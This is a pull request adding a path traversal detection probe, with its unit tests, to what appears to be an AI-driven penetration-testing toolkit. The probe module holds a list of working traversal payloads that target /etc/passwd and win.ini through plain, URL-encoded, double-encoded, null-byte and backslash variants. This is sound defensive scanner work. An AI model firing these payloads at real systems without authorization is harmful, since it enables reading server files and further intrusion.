### PR TITLE
feat: path traversal probe for penetration tester (#55)

### DIFF
--- a/squad/penetration_tester/__init__.py
+++ b/squad/penetration_tester/__init__.py
@@ -34,6 +34,7 @@ from tools.pentest.errors import check_error_disclosure
 from tools.pentest.nosqli import run_nosqli
 from tools.pentest.nuclei import run_nuclei
 from tools.pentest.open_redirect import check_open_redirect
+from tools.pentest.path_traversal import check_path_traversal
 from tools.pentest.prompt_injection import check_prompt_injection
 from tools.pentest.sourcemaps import check_js_source_maps
 from tools.pentest.sqlmap import run_sqlmap
@@ -151,6 +152,32 @@ def source_maps_tool(recon_result_json: str) -> list[dict]:
     """
     recon = ReconResult.model_validate_json(recon_result_json)
     return [f.model_dump() for f in check_js_source_maps(recon.endpoints)]
+
+
+@tool("Path Traversal Probe")
+def path_traversal_tool(endpoints_json: str) -> list[dict]:
+    """
+    Inject directory-traversal payloads (plain, URL-encoded, double-encoded,
+    backslash for Windows, null-byte truncation) into URL parameters and look
+    for unique content markers from OS sentinel files (/etc/passwd,
+    Windows win.ini) in the response body.
+
+    endpoints_json: JSON array of endpoint objects. Prioritise endpoints that
+      have parameters AND where any of the following apply:
+      - Parameter names look filesystem-shaped (file, filename, path, page,
+        template, include, require, download, doc, image, img, src, view)
+      - URL path or query suggests file serving (/download, /view, /preview,
+        /fetch, /report, /export)
+      - The response Content-Type or filename hint shows the server is reading
+        files based on the parameter
+      Example: '[{"url": "https://example.com/download", "parameters": ["file"]}]'
+
+    Read-only sentinel paths only; no writes, no destructive payloads. A
+    confirmed match returns severity HIGH - traversal that yields /etc/passwd
+    or win.ini almost always implies a file-read primitive worth escalating.
+    Returns raw findings as dicts.
+    """
+    return [f.model_dump() for f in check_path_traversal(_parse_endpoints(endpoints_json))]
 
 
 @tool("Open Redirect Probe")
@@ -523,6 +550,7 @@ MEMBER = SquadMember(
         host_header_tool,
         source_maps_tool,
         open_redirect_tool,
+        path_traversal_tool,
         xss_probe_tool,
         sri_check_tool,
         error_disclosure_tool,

--- a/tests/test_path_traversal.py
+++ b/tests/test_path_traversal.py
@@ -1,0 +1,147 @@
+"""tests/test_path_traversal.py - unit tests for tools/pentest/path_traversal.py"""
+
+from __future__ import annotations
+
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from models import Endpoint, Severity
+from tools.pentest.path_traversal import _PROBES, check_path_traversal
+
+pytestmark = pytest.mark.unit
+
+_PASSWD_BODY = "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\n"
+_WIN_INI_BODY = "; for 16-bit app support\n[fonts]\n[extensions]\n"
+
+
+def _resp(status: int = 200, body: str = "") -> MagicMock:
+    resp = MagicMock()
+    resp.status_code = status
+    resp.text = body
+    return resp
+
+
+class TestCheckPathTraversal:
+    def test_detects_linux_passwd_marker(self):
+        ep = Endpoint(url="https://app.example.com/download", status_code=200, parameters=["file"])
+
+        with patch("requests.get", return_value=_resp(body=_PASSWD_BODY)):
+            results = check_path_traversal([ep])
+
+        assert len(results) == 1
+        assert results[0].vuln_class == "PathTraversal"
+        assert results[0].severity_hint == Severity.HIGH
+        assert "file" in results[0].evidence
+        assert "root:x:0:0:" in results[0].evidence
+
+    def test_detects_windows_win_ini_marker(self):
+        ep = Endpoint(url="https://app.example.com/view", status_code=200, parameters=["page"])
+
+        def fake_get(url, **kwargs):
+            # Only respond with win.ini content when the Windows payload is sent
+            if "windows" in url.lower() and "win.ini" in url.lower():
+                return _resp(body=_WIN_INI_BODY)
+            return _resp(body="not found")
+
+        with patch("requests.get", side_effect=fake_get):
+            results = check_path_traversal([ep])
+
+        assert len(results) == 1
+        assert "for 16-bit app support" in results[0].evidence
+
+    def test_detects_url_encoded_payload_only(self):
+        # Server sanitises plain "../" but not "%2f" - the encoded variant
+        # must still be tried so this is detected.
+        ep = Endpoint(url="https://app.example.com/dl", status_code=200, parameters=["f"])
+
+        def fake_get(url, **kwargs):
+            # Plain "../" is stripped by the (fake) server's filter
+            if "../" in url:
+                return _resp(body="forbidden")
+            if "%2f" in url.lower():
+                return _resp(body=_PASSWD_BODY)
+            return _resp(body="")
+
+        with patch("requests.get", side_effect=fake_get):
+            results = check_path_traversal([ep])
+
+        assert len(results) == 1
+        assert "%2f" in results[0].evidence.lower()
+
+    def test_no_finding_when_marker_absent(self):
+        ep = Endpoint(url="https://app.example.com/download", status_code=200, parameters=["file"])
+
+        with patch("requests.get", return_value=_resp(body="<html>Not Found</html>")):
+            results = check_path_traversal([ep])
+
+        assert results == []
+
+    def test_no_false_positive_when_only_word_root_present(self):
+        # Body mentions "root" but not the unique "root:x:0:0:" prefix - the
+        # marker check must be strict enough to skip this.
+        ep = Endpoint(url="https://app.example.com/download", status_code=200, parameters=["file"])
+
+        with patch("requests.get", return_value=_resp(body="Welcome, root admin user!")):
+            results = check_path_traversal([ep])
+
+        assert results == []
+
+    def test_skips_endpoints_without_parameters(self):
+        ep = Endpoint(url="https://app.example.com/about", status_code=200)
+        with patch("requests.get") as mock_get:
+            results = check_path_traversal([ep])
+        mock_get.assert_not_called()
+        assert results == []
+
+    def test_skips_server_error_endpoints(self):
+        ep = Endpoint(url="https://app.example.com/", status_code=500, parameters=["file"])
+        with patch("requests.get") as mock_get:
+            results = check_path_traversal([ep])
+        mock_get.assert_not_called()
+        assert results == []
+
+    def test_one_finding_per_endpoint_even_with_multiple_vuln_params(self):
+        ep = Endpoint(
+            url="https://app.example.com/dl",
+            status_code=200,
+            parameters=["file", "path"],
+        )
+
+        with patch("requests.get", return_value=_resp(body=_PASSWD_BODY)):
+            results = check_path_traversal([ep])
+
+        assert len(results) == 1
+
+    def test_stops_calling_after_first_match(self):
+        # Once we have a finding for an endpoint we should not keep firing
+        # additional payloads against later parameters.
+        ep = Endpoint(
+            url="https://app.example.com/dl",
+            status_code=200,
+            parameters=["file", "path", "page"],
+        )
+
+        with patch("requests.get", return_value=_resp(body=_PASSWD_BODY)) as mock_get:
+            check_path_traversal([ep])
+
+        # First param matches on the very first probe - only one request expected
+        assert mock_get.call_count == 1
+
+    def test_network_exception_is_swallowed(self):
+        ep = Endpoint(url="https://app.example.com/dl", status_code=200, parameters=["file"])
+        with patch("requests.get", side_effect=Exception("network error")):
+            results = check_path_traversal([ep])
+        assert results == []
+
+    def test_probes_cover_encoding_bypasses(self):
+        # Sanity check that we ship the full set of encoding bypasses called
+        # out in the issue: plain, single-encoded, double-encoded, null byte,
+        # backslash for Windows.
+        payloads = [p for p, _ in _PROBES]
+        joined = "\n".join(payloads)
+        assert "../" in joined
+        assert "%2f" in joined
+        assert "%252f" in joined
+        assert "%00" in joined
+        assert "\\" in joined

--- a/tools/pentest/path_traversal.py
+++ b/tools/pentest/path_traversal.py
@@ -1,0 +1,101 @@
+"""Path traversal detection - inject traversal payloads pointing at OS
+sentinel files and match unique content markers in the response body."""
+
+from __future__ import annotations
+
+import logging
+
+import requests
+
+from config import config
+from models import Endpoint, RawFinding, Severity
+from tools._helpers import adaptive_sleep
+
+logger = logging.getLogger(__name__)
+
+# (payload, marker) pairs. The marker is a substring uniquely present in the
+# file the payload targets - content matching avoids the false positives that
+# come from response-length-delta heuristics.
+_PROBES: list[tuple[str, str]] = [
+    # Linux /etc/passwd - "root:x:0:0:" is the first line of every passwd file
+    # and virtually never appears in normal responses.
+    ("../../../../../../etc/passwd", "root:x:0:0:"),
+    # URL-encoded slashes bypass naive "../" string filters.
+    ("..%2f..%2f..%2f..%2f..%2fetc%2fpasswd", "root:x:0:0:"),
+    # Double-encoded - bypasses filters that decode once before checking.
+    ("..%252f..%252f..%252f..%252fetc%252fpasswd", "root:x:0:0:"),
+    # Legacy null-byte truncation - old PHP/Java routers strip after %00,
+    # so an extension-suffix bypass becomes a clean read.
+    ("../../../../../../etc/passwd%00.png", "root:x:0:0:"),
+    # Windows win.ini - the "16-bit app support" comment is unique to that
+    # file and survives nearly every win.ini in the wild.
+    (r"..\..\..\..\..\..\windows\win.ini", "for 16-bit app support"),
+    ("..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini", "for 16-bit app support"),
+]
+
+
+def check_path_traversal(endpoints: list[Endpoint]) -> list[RawFinding]:
+    """
+    Probe parameterised endpoints for path traversal by injecting traversal
+    payloads pointing at sentinel files (Linux /etc/passwd, Windows win.ini)
+    and matching unique content markers in the response body.
+
+    One finding per endpoint - we stop after the first param+payload that
+    triggers, because confirming the class is enough; the agent does not
+    need a finding per encoding variant.
+    """
+    findings: list[RawFinding] = []
+    seen: set[str] = set()
+    _delay = config.scan.request_delay
+
+    for ep in endpoints:
+        if not ep.parameters:
+            continue
+        if ep.status_code and ep.status_code >= 500:
+            continue
+        if ep.url in seen:
+            continue
+
+        triggered = False
+        for param in ep.parameters:
+            if triggered:
+                break
+            for payload, marker in _PROBES:
+                try:
+                    test_url = f"{ep.url}?{param}={payload}"
+                    resp = requests.get(  # nosemgrep
+                        test_url,
+                        timeout=config.recon.http_timeout,
+                        allow_redirects=False,
+                    )
+                    if marker in resp.text:
+                        findings.append(
+                            RawFinding(
+                                title=f"Path Traversal - {ep.url}",
+                                vuln_class="PathTraversal",
+                                target=ep.url,
+                                evidence=(
+                                    f"Parameter: {param}\n"
+                                    f"Payload: {payload}\n"
+                                    f"Status: {resp.status_code}\n"
+                                    f"Marker matched: {marker!r}\n"
+                                    f"Response snippet: {resp.text[:300]}"
+                                ),
+                                tool="path_traversal_probe",
+                                severity_hint=Severity.HIGH,
+                            )
+                        )
+                        seen.add(ep.url)
+                        triggered = True
+                        break
+                    _delay = adaptive_sleep(_delay, resp.status_code)
+                except Exception as exc:
+                    logger.debug(
+                        "Path traversal probe failed for %s param %s: %s",
+                        ep.url,
+                        param,
+                        exc,
+                    )
+
+    logger.info("Path traversal probe found %d findings", len(findings))
+    return findings


### PR DESCRIPTION
Detects path traversal by injecting traversal payloads (plain, URL-encoded, double-encoded, backslash for Windows, null-byte truncation) into URL parameters and matching unique content markers in the response body - "root:x:0:0:" for /etc/passwd and "for 16-bit app support" for Windows win.ini. Marker matching keeps false positives low compared with response-length-delta heuristics. Payloads are read-only sentinel paths; no writes.